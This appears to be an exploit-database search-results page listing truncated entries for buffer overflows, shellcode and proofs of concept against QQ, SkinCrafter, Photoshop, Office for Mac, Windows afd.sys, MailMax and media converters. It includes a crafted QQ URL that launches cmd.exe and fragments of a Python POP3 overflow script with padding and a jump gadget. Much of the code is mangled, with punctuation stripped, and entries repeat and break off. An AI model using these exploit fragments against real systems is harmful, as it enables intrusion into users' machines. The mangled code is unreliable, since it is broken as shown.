7260 matches found
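Tencent TM, QQ message remote command execution vulnerability
When a user sends a "URL" in this format: codewww.baidu.com..............\Windows\System32\cmd.exe/code and the recipient left-clicks to open the URL, it is opened as a path, which makes it possible to maliciously run programs and system commands and creates a serious security risk. The principle behind the vulnerability is very simple, so I won't explain it……, the conditions are as follows: 1. It cannot be URL-encoded, only plain text, 囧rz…… 2. Chinese or English spaces cannot be used; the path gets "broken". (You could try constructing it by sending a custom packet, or try sending from the Web client.) 3. Special characters such as the % sign cannot be present, for the same reason as the first point....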
SkinCrafter ActiveX Control 3.0 - Local Buffer Overflow
SkinCrafter ActiveX Control 3.0 - Local Buffer Overflow Software : SkinCrafter from NMSoft Technologies Version : SkinCrafter version 3.0 Title : Buffer overflow in skincrafter3vs2005.dll of skinCrafter vs3.0 Link : http://www.skincrafter.com/downloads/SkinCrafterDemo20052008x86.zip Date : May 17...
linux/x86 - polymorphic espeak shellcode - 45 bytes
Exploit database separated by exploit type (local, remote, DoS, etc.) + Site : 1337day.com + Support e-mail :...
SkinCrafter ActiveX Control 3.0 - Local Buffer Overflow
Software : SkinCrafter from NMSoft Technologies Version : SkinCrafter version 3.0 Title : Buffer overflow in skincrafter3vs2005.dll of skinCrafter vs3.0 Link : http://www.skincrafter.com/downloads/SkinCrafterDemo20052008x86.zip Date : May 17, 2012 Tested on : XP SP2 The vulnerability lies in the...
linux/x86 execve/bin/dash 42 bytes
linux/x86 execve/bin/dash 42 bytes. Shellcode exploit for linux platform / linux/x86 execve/bin/dash 42 bytes Author : X-h4ck [email protected], [email protected] www.pirate.al , www.flashcrew.in Greetz : mywisdom - Danzel - Wulns - IllyrianWarrior- Ace - M4yh3m - Saldeath ev1lut1on - Lekosta -...
Adobe Photoshop CS5.1 U3D.8BI Collada Asset Elements Stack Overflow
No description provided by source. ?php // Adobe Photoshop CS5.1 U3D.8bi Library Collada Asset Elements // Unicode Conversion Stack Based Buffer Overflow poc .dae // 32bit/SEH // // unicode overflow occurs when overlong asset elements are processed // one could be able to return inside an ASCII...
Adobe Photoshop CS5.1 U3D.8BI Collada Asset Elements Stack Overflow
Exploit for windows platform in category local exploits ?php // Adobe Photoshop CS5.1 U3D.8bi Library Collada Asset Elements // Unicode Conversion Stack Based Buffer Overflow poc .dae // 32bit/SEH // // unicode overflow occurs when overlong asset elements are processed // one could be able to...
New Malware Found Exploiting Mac OS X Snow Leopard
Many Mac users recently have found themselves stumbling out of the darkness, shielding their eyes from the spotlight that attackers and malware writers are now shining on them. Malware having been a rarity on OS X, it’s taking some time to adjust, but while that’s happening the attackers are busy...
Samsung NET-i Viewer Active-X SEH Overwrite
' Exploit Title: SAMSUNG NET-i viewer ActiveX SEH Overwrite ' Date: April 30 2012 ' Author: Blake ' Software Link: http://www.samsungsecurity.com/product/productview.asp?idx=5828 ' Version: 1.37 ' Tested on: Windows XP SP3 with IE6 running on Virtualbox ' RequestScreenOptimization in...
CPE17 Autorun Killer 1.7.1 Buffer Overflow
CPE17 Autorun Killer 'CPE17 Autorun Killer %q readfile function is vulnerable it can be overflow , 'Author' = 'Xelenonz' , 'Version' = '0.1', 'Payload' = 'EncoderType' = Msf::Encoder::Type::AlphanumMixed, 'EncoderOptions' = 'BufferRegister'='ECX', , 'DefaultOptions' = 'DisablePayloadHandler' =...
RTF Pfragments exploit for MAC office 2008
No description provided by source. RTF Pfragments exploit for MAC office 2008 Author Abhishek Lyall - abhilyallatgmaildotcom, infoataslitsecuritydotcom Advanced Hacking Trainings - http://training.aslitsecurity.com Web - http://www.aslitsecurity.com/ Blog - http://www.aslitsecurity.blogspot.com/...
Microsoft Windows - afd.sys Local Kernel (PoC) (MS11-046)
Microsoft Windows - afd.sys Local Kernel PoC MS11-046 / MS11-046 Was a Zero day found in the wild, reported to MS by Steven Adair from the Shadowserver Foundation and Chris S. Ronnie Johndas wrote the writeup dissecting a malware with this exploit. I Rahul Sasifb1h2s just made the POC exploit...
MS11-046 Afd.sys Proof of Concept
Exploit for windows platform in category dos / poc / MS11-046 Was a Zero day found in the wild, reported to MS by Steven Adair from the Shadowserver Foundation and Chris S. Ronnie Johndas wrote the writeup dissecting a malware with this exploit. I Rahul Sasifb1h2s just made the POC exploit...
Microsoft Windows - 'afd.sys' Local Kernel (PoC) (MS11-046)
/ MS11-046 Was a Zero day found in the wild, reported to MS by Steven Adair from the Shadowserver Foundation and Chris S. Ronnie Johndas wrote the writeup dissecting a malware with this exploit. I Rahul Sasifb1h2s just made the POC exploit available. Reference: ms8-66, ms6-49 Too lazy to add...
Microsoft Office 2008 SP0 (Mac) - RTF pFragments
RTF Pfragments exploit for MAC office 2008 Author Abhishek Lyall - abhilyallatgmaildotcom, infoataslitsecuritydotcom Advanced Hacking Trainings - http://training.aslitsecurity.com Web - http://www.aslitsecurity.com/ Blog - http://www.aslitsecurity.blogspot.com/ Office 2007 for MC SP 0...
CastRipper 2.9.6 (.pls)/(wvx) buffer overflow Exploit
Exploit for windows platform in category local exploits Exploit Title: CastRipper 2.9.6 .pls/wvx buffer overflow Exploit Author: Caddy-Dz Facebook Page: http://www.facebook.com/ALG.Cyber.Army E-mail: islambabiaathotmail.com Vendor: http://mini-stream.net/castripper/ Category:: Local Exploits Test...
Mini-Stream RM-MP3 Converter 3.1.2.2 Buffer Overflow
Exploit Title : Mini-stream RM-MP3 Converter V 3.1.2.2 Local Buffer OverFlow Author : SkY-NeT SySteMs Software Link : http://mini-stream.net/rm-to-mp3-converter/download/ Version : 3.1.2.2 Tested on : Xp Sp 2 Category : Local Code : Python Email : [email protected] WebSite :...
Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow
Exploit Title : Mini-stream RM-MP3 Converter V 3.1.2.2 Local Buffer OverFlow Author : SkY-NeT SySteMs Software Link : http://mini-stream.net/rm-to-mp3-converter/download/ Version : 3.1.2.2 Tested on : Xp Sp 2 Category : Local Code : Python Email : [email protected] WebSite :...
MailMax 4.6 POP3 Buffer Overflow
!/usr/bin/python MailMax \n" %sys.argv0 sys.exit print "\n! Connecting to %s ..." %sys.argv1 connect to host sock = socketAFINET,SOCKSTREAM sock.connectsys.argv1,intsys.argv2 sock.recv1024 time.sleep5 buffer = "USER " buffer += "A" 1439 padding buffer += "\xEB\x06\x90\x90" Short jmp 6 bytes buffe...
MailMax 4.6 - POP3 USER Remote Buffer Overflow
MailMax 4.6 - POP3 USER Remote Buffer Overflow !/usr/bin/python MailMax \n" %sys.argv0 sys.exit print "\n! Connecting to %s ..." %sys.argv1 connect to host sock = socketAFINET,SOCKSTREAM sock.connectsys.argv1,intsys.argv2 sock.recv1024 time.sleep5 buffer = "USER " buffer += "A" 1439 padding buffe...